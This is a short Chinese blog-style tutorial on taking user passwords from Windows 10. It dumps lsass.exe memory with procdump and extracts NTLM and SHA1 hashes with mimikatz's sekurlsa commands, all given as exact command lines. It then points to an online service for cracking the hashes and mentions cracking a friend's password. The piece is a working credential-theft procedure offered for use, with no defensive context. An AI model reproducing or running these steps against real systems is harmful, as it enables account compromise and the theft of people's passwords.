windows10用户密码获取

windows10用户密码获取

简单介绍一下lsass.exe，这是是一个系统进程，用于本地安全认证服务器，她为winlogon服务的用户验证生成一个进程。如果身份验证成功，Lsass将生成用户的访问令牌，用于启动初始外壳程序。当用户登录时，lsass.exe会在内存中自动存储用户的登录凭证，攻击者就可以利用这一点来盗取用户的信息。
环境：windows10 x64
工具：procdump+mimikatz

直接上操作：
管理员权限运行cmd.exe（判断是管理员才有权限操作lsass.exe进程）,打开终端执行：procdump64.exe -accepteula -ma lsass.exe lsass.dmp

此时在当前文件夹下会出现刚生成的lsass.dmp文件

利用mimikatz提取lsass.dmp中的登录凭据
终端执行：mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” exit
可以看到抓取到用户admin，test的所在域域名，NTML值和SHA1值
没有明文，这难道就结束了吗？那不是挺失败的！
推荐一个免费且高效的瑞士网站，大部分密码都能跑出来，唯一没成功的一次是跑一个朋友的密码，问了才知道，大小写字母+数字+特殊字符一共十个字符（变态）。
不废话了，上效果图：


知识是无限的，分享我学到的。